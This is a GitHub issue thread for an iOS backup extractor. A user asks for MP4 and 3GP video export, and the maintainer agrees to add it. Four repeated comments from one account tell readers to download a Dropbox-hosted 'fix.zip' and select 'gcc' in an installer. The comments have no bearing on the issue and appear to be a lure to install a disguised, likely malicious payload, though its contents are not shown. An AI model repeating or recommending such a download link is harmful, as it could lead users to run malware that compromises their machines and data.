### ISSUE TITLE
MP4 and 3GP video formats

### ISSUE THREAD

**Issue by mertozb** [joz-k/ios_backup_extractor#3]
Hey, that made my life easier so thank you.
One thing that i came across was the .MP4 and .3GP video formats are not included in export files while .MOV is included. Is it possible to include them in a new release, thank you again.

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by joz-k** [comment]
Hi. It is definitely not a problem to add .mp4 and .3gp to the list of exported files. However, I have never seen iOS itself to save videos with these extensions. I guess they were saved to your camera roll from a different app (like WhatsUp or similar). Anyway, I'll fix it in the next release.
